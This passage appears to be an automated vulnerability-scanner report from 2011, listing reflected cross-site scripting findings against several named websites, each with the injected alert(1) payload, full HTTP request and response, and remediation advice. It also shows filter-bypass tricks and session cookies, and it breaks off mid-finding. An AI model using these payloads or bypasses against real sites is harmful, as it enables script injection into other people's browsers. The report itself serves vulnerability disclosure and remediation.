Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:04:45 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=stylesheets; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:04:45 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:06:45 GMT;path=/
Content-Length: 16737

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="Cf0bb"><img Src=a Onerror=alert(1)>a86826fda4 - topic_page_redesign s_kosmix chimborazo 152138.css" />
...[SNIP]...

4.35. http://www.kosmix.com/stylesheets/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kosmix.com
Path:   /stylesheets/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4932b\"%3b512738e9867 was submitted in the REST URL parameter 2. This input was echoed as 4932b\\";512738e9867 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /stylesheets/4932b\"%3b512738e9867/topic_page_redesign-s_kosmix-chimborazo-152138.css?1304450611 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:04:47 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=stylesheets; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:04:47 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:06:47 GMT;path=/
Content-Length: 16531

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<script type="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "f062f6f0-615b-012e-931e-003048fe4cb2";
   kl.svid = "1440764625";
   kl.query = "4932b\\";512738e9867";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.kosmix.com/";
   kl.build_id = '152138';
   kl.release_
...[SNIP]...

4.36. http://www.mathias-bank.de/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mathias-bank.de
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35743"><script>alert(1)</script>5e644aedf8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 35743\"><script>alert(1)</script>5e644aedf8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?35743"><script>alert(1)</script>5e644aedf8f=1 HTTP/1.1
Host: www.mathias-bank.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:47:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Pingback: http://www.mathias-bank.de/xmlrpc.php
Set-Cookie: bb2_screener_=1305481674+173.193.214.243; path=/
Set-Cookie: PHPSESSID=ef8522246882e6c8d9f89abbce94c37c; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<form enctype="multipart/form-data" action="/?35743\"><script>alert(1)</script>5e644aedf8f=1#usermessagea" method="post" class="cform" id="cformsform">
...[SNIP]...

4.37. http://www.orcon.net.nz/address_locator/=&type=orconatwork [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.orcon.net.nz
Path:   /address_locator/=&type=orconatwork

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cebce</script><script>alert(1)</script>30cb7ccddae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /address_locator/=&type=orconatwork?cebce</script><script>alert(1)</script>30cb7ccddae=1 HTTP/1.1
Host: www.orcon.net.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=9264363.1305480184.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9264363.834091965.1305480184.1305480184.1305480184.1; exp_last_visit=990076976; __utmc=9264363; exp_last_activity=1305437095; __utmb=9264363.7.10.1305480184; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fabout%2Fbrowse%2Fcategory%2Facquisitions%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fmobile%2F%22%3Bi%3A3%3Bs%3A12%3A%22%2Fsite%2Flogin%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:57:18 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 17:57:18 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: exp_last_activity=1305439038; expires=Mon, 14-May-2012 17:57:18 GMT; path=/
Connection: close
Content-Length: 12693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Conten
...[SNIP]...
;

$(document).ready(function() {
    $("#addressSearch").validate();
//fullURL = parent.document.URL;
//type = fullURL.substring(fullURL.indexOf('?')+6, fullURL.length);
var type = "orconatworkcebce</script><script>alert(1)</script>30cb7ccddae=1";

if(type == "orconatwork"){
connectionURL = 'atwork.php';
}else{
connectionURL = 'athome.php';
}


/*
$.ajax({
type: "GET",
url: "/modules/views/
...[SNIP]...

4.38. http://www.righthealth.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c39f"%3balert(1)//60590ec83f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5c39f";alert(1)//60590ec83f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?5c39f"%3balert(1)//60590ec83f6=1 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:01:23 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: kid=082e6b80-615c-012e-2f5e-003048fe4c0a; path=/; expires=Sat, 15-May-2021 20:01:23 GMT
Set-Cookie: as=ref_absent; path=/; expires=Sat, 15-May-2021 20:01:23 GMT
Set-Cookie: KC=K; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:01:23 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b045525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:16:23 GMT;path=/
Content-Length: 56012

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
sive_banner_ad"] = "";
       searchParams["urchin_id"] = "UA-2133509-1";
       searchParams["referrer_query"] = "";
       searchParams["q_lower"] = "kosmixhomepage";
       searchParams["abtest"] = "";
       searchParams["5c39f";alert(1)//60590ec83f6"] = "1";
       searchParams["results_lang"] = "en";
       searchParams["ac"] = "1299";
       searchParams["buildid"] = "153574";
       searchParams["referrer"] = "";
       searchParams["q_category_kcsid"] = "0";
       search
...[SNIP]...

4.39. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /c-javascripts/kapp_relevance.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76cce"><ScRiPt>alert(1)</ScRiPt>e269f22225 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /c-javascripts76cce"><ScRiPt>alert(1)</ScRiPt>e269f22225/kapp_relevance.js?1288734473 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:12 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=c-javascripts76cce%22%3E%3CScRiPt%3Ealert%281%29%3C; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:12 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:12 GMT;path=/
Content-Length: 20713

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<link rel="canonical" href="http://www.righthealth.com/c-javascripts76cce"><ScRiPt>alert(1)</ScRiPt>e269f22225/kapp_relevance.js"/>
...[SNIP]...

4.40. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /c-javascripts/kapp_relevance.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8debe<img%20src%3da%20onerror%3dalert(1)>fe2e1dab582 was submitted in the REST URL parameter 2. This input was echoed as 8debe<img src=a onerror=alert(1)>fe2e1dab582 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c-javascripts/kapp_relevance.js8debe<img%20src%3da%20onerror%3dalert(1)>fe2e1dab582?1288734473 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:55 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=c-javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:54 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:55 GMT;path=/
Content-Length: 20915

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<strong>Kapp Relevance.js8debe<img Src=a Onerror=alert(1)>fe2e1dab582</strong>
...[SNIP]...

4.41. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /c-javascripts/kapp_relevance.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba315"style%3d"x%3aexpression(alert(1))"708e8d9fd20 was submitted in the REST URL parameter 2. This input was echoed as ba315"style="x:expression(alert(1))"708e8d9fd20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /c-javascripts/kapp_relevance.jsba315"style%3d"x%3aexpression(alert(1))"708e8d9fd20?1288734473 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:42 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=c-javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:42 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:42 GMT;path=/
Content-Length: 20945

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="Kapp Relevance.jsba315"style="x:expression(alert(1))"708e8d9fd20" />
...[SNIP]...

4.42. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.righthealth.com
Path:   /c-javascripts/kapp_relevance.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4411c\"%3baaf03005ad2 was submitted in the REST URL parameter 2. This input was echoed as 4411c\\";aaf03005ad2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /c-javascripts/kapp_relevance.js4411c\"%3baaf03005ad2?1288734473 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:44 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=c-javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:44 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:44 GMT;path=/
Content-Length: 20660

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
ext/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "ffeeb640-615b-012e-af22-003048fe49ee";
   kl.svid = "1574211534";
   kl.query = "Kapp+Relevance.js4411c\\";aaf03005ad2";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.righthealth.com/";
   kl.build_id = '153574';
   kl.rel
...[SNIP]...

4.43. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /images/health/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ea9de<img%20src%3da%20onerror%3dalert(1)>5a005695197 was submitted in the REST URL parameter 2. This input was echoed as ea9de<img src=a onerror=alert(1)>5a005695197 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /images/healthea9de<img%20src%3da%20onerror%3dalert(1)>5a005695197/favicon.ico HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; last_referrer=; __utmz=168930850.1305489674.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168930850.799214937.1305489674.1305489674.1305489674.1; __utmc=168930850; __utmb=168930850.1.10.1305489674; __qca=P0-481111707-1305489677084; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:11:43 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=images; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:11:43 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:26:43 GMT;path=/
Content-Length: 20642

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<strong>Healthea9de<img Src=a Onerror=alert(1)>5a005695197</strong>
...[SNIP]...

4.44. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.righthealth.com
Path:   /images/health/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc29b\"%3b1cf7eaa7765 was submitted in the REST URL parameter 2. This input was echoed as bc29b\\";1cf7eaa7765 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /images/healthbc29b\"%3b1cf7eaa7765/favicon.ico HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; last_referrer=; __utmz=168930850.1305489674.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168930850.799214937.1305489674.1305489674.1305489674.1; __utmc=168930850; __utmb=168930850.1.10.1305489674; __qca=P0-481111707-1305489677084; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:11:32 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=images; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:11:32 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:26:32 GMT;path=/
Content-Length: 20413

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
ript type="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "ffeeb640-615b-012e-af22-003048fe49ee";
   kl.svid = "838229798";
   kl.query = "Healthbc29b\\";1cf7eaa7765";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "";
   kl.build_id = '153574';
   kl.release_id = 'EVEREST.REL.BLD.
...[SNIP]...

4.45. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /images/health/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be586"style%3d"x%3aexpression(alert(1))"8bb8d80a2ee was submitted in the REST URL parameter 2. This input was echoed as be586"style="x:expression(alert(1))"8bb8d80a2ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /images/healthbe586"style%3d"x%3aexpression(alert(1))"8bb8d80a2ee/favicon.ico HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; last_referrer=; __utmz=168930850.1305489674.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168930850.799214937.1305489674.1305489674.1305489674.1; __utmc=168930850; __utmb=168930850.1.10.1305489674; __qca=P0-481111707-1305489677084; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:11:30 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=images; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:11:30 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:26:30 GMT;path=/
Content-Length: 20669

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="Healthbe586"style="x:expression(alert(1))"8bb8d80a2ee favicon.ico" />
...[SNIP]...

4.46. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
